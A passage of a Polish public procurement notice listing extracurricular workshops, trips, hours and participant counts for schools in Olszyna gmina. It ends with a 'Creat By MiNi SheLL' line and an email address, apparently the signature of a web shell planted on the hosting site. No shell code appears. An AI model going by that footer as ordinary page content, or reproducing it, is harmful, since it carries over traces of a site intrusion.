Zadanie 4. - Koło Młodego Regionalisty w kl. IV - VI- liczba godzin 38, liczba uczestników 20
Planowane działania:
1.	koło - 26 godzin,
2.	wycieczka do teatru - 8 godzin,
3.	podsumowanie zajęć - 4 godziny.

Zadanie 5. - Warsztaty artystyczne Moja mała Ojczyzna w kl. IV-VI - liczna godzin 46, liczba uczestników 20
Planowane działania:
1.	warsztaty - 36 godzin,
2.	wycieczka 1 - 5 godzin,
3.	wycieczka 2 - 5 godzin,

Zadanie 6. - Koło przyrodnicze dla klas IV - VI - liczna godzin 103, liczba uczestników 20
Planowane działania:
1.	koło - 87 godzin,
2.	wycieczka Bank Nasion - 8 godzin,
1.	wycieczka Wrocław - 8 godzin.
Zadanie 7. - Warsztaty matematyczno - przyrodnicze dla klas IV - VI  - liczba godzin 74, liczba uczestników 20
planowane działania:
1.	warsztaty - 50 godzin,
2.	wycieczka 1 -8 godzin,
3.	wycieczka 2 -8 godzin,
4.	wycieczka 3 -8 godziny.

Zadanie 8.. - Warsztaty regionalne  - liczba godzin 138, liczba uczestników 20
Planowane działania: warsztaty - 138 godzin.

Zadanie 9. - Warsztaty wspomagające w kl. I - III- liczba godzin 94, liczba uczestników 12
Planowane działania: warsztaty,

Zadanie 10. - Warsztaty wspomagające w kl. IV- VI- liczba godzin 141, liczba uczestników 20
planowane działania: warsztaty - 141 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 16.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Szkoła Podstawowa  im. Janusza Korczaka w Biedrzychowicach, Biedrzychowice 93,
59-830 Olszyna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1.  Niemiecki nic trudnego- planowana liczba godzin 144, liczba uczestników 30
Planowane działania:
1.	warsztaty - 40 godzin,
2.	gry zabawy językowe - 40 godzin,
3.	wystawy - 5 godzin,
4.	dzień języka niemieckiego - 5 godzin,
5.	konkurs - 26 godzin,
6.	piknik Klubu Odkrywców- 14 godzin,
7.	gazetka - 14 godzin.

Zadanie 2. - Gry i zabawy z językiem angielskim- liczna godzin 115, liczba uczestników 30
Planowane działania:
1.	warsztaty - 35 godzin,
2.	gry zabawy językowe - 37 godzin,
3.	wystawy- 14 godzin,
4.	konkurs - 15 godzin,
5.	piknik Klubu Odkrywców - 14 godzin.
  



Zadanie 3. - Odkrywamy świat roślin i zwierząt- liczna godzin 168, liczba uczestników 20  
Planowane działania:
1.	warsztaty  - 45 godzin,
2.	Wycieczka 1 - 16 godzin,
3.	Wycieczka 2 - 3 godzin,
4.	Wycieczka 3 - 10 godzin,
5.	zajęcia badawcze ? - 15 godzin,
6.	zajęcia praktyczne - 30 godzin
7.	zajęcia plastyczne - 25 godzin,
8.	wystawa - 10 godzin,
9.	piknik Klubu Odkrywców - 14 godzin.


Zadanie 4. - Śladami przeszłości  - liczna godzin 185, liczba uczestników 20
1.	warsztaty - 60 godzin,
2.	wycieczka 1 - 4 godzin,
3.	wycieczka 2 -14 godzin,
4.	wycieczka rowerowa - 16 godzin,
5.	wystawa - 30 godzin,
6.	zajęcia badawcze - 35 godzin,
7.	konkurs - 12 godzin,
8.	piknik Klubu Odkrywców - 14 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 16.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Gminne Gimnazjum Publiczne w Olszynie,  ul. Wolności 17, 59-830 Olszyna..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1. - Tutaj mieszkam, uczę się i wypoczywam - liczba godzin 69, liczba uczestników 30,
planowane działania:
1.	zajęcia dydaktyczne - 65 godzin,
2.	podsumowanie (prezentacja i ewaluacja) - 4 godziny.

Zadanie 2. - Zajęcia wspierające uczniów w przygotowaniu do egzaminu gimnazjalnego w bloku przedmiotów matematyczno-przyrodniczych.- liczba godzin 412, liczba uczestników 140  
planowane działania:
1.	Zajęcia pozalekcyjne: matematyka, biologia, fizyka, chemia, geografia, gry logiczne - 412 godzin,

Zadanie 3. - Zjęcia pozalekcyjne rozbudzające zainteresowania uczniów historią regionu- liczba godzin 84, liczba uczestników 30
  planowane działania:
1.	zajęcia dydaktyczne- 80 godzin,
2.	podsumowanie zadania 4 godziny.

Zadanie 4. - Powietrze to ocean życia- liczba godzin 70, liczba uczestników 30
planowane działania:
1.	zajęcia dydaktyczne - 
2.	badanie stanu czystości powietrza,
3.	wywiad,
4.	wystawa - zanieczyszczenia powietrza,
5.	wystawa fotograficzna - Najciekawsze zjawisko pogodowe,
6.	ankieta,
7.	podsumowanie.

Zadanie 5. - Uczestniczę w tworzeniu społeczeństwa informatycznego- liczba godzin 102, liczba uczestników 48
planowane działania:
1.	zajęcia dydaktyczne

Zadanie 6. - Orientacja zawodowa i szkolna - liczba godzin 212, liczba uczestników 200
planowane działania:
1.	zajęcia dydaktyczne,
2.	krok w przyszłość,
3.	praca w życiu człowieka,
4.	rozmowa kwalifikacyjna,
5.	bal zawodowy,
6.	wycieczka Olszyna-Gryfów Śl.,
7.	wycieczka Radogoszcz,
8.	wycieczka Lubań,
9.	wycieczka Gryfów.

Zadanie 7. - Uchwycone w kadrze  - liczba godzin 138, liczba uczestników 30
planowane działania:
1.	zajęcia dydaktyczne .
2.	zgromadzenie filmoteki
3.	wyjazd edukacyjny Jelenia Góra,
4.	wyjazd edukacyjny - kino multimedialne Jelenia G. lub Zgorzelec

Zadanie 8. - Dzień nauki Drzwi muz są otwarte - każdy może wejść do krainy nauki- liczba godzin 64, liczba uczestników 200
planowane działania:
1.	zajęcia dydaktyczne
2.	prezentacja

Zadanie 9.  -Wskaźnikiem po mapie -rowerem po regonie - liczba godzin 122, liczba uczestników 30
planowane działania:
1.	zajęcia dydaktyczne,
2.	projektowanie tras wycieczek rowerowych,
3.	wycieczki

Zadanie 10. - Historia, polityka i literatura z przyrodą w tle - liczba godzin 150, liczba uczestników 30
planowane działania:

1.	zajęcia dydaktyczne
2.	wycieczka trasą parków i pałaców,
3.	szlakiem wygasłych wulkanów,
4.	spotkanie z literaturą i sztuka regionu,
5.	rajd trasą obozów pracy w Olszynie, Lubaniu, Leśnej i Żaganiu,
6.	rezerwat przyrodniczy,
7.	śladami pałaców rzeki Kwisy,
8.	rajd historia i przyroda razem,
9.	śladami twórców regionu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 16.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com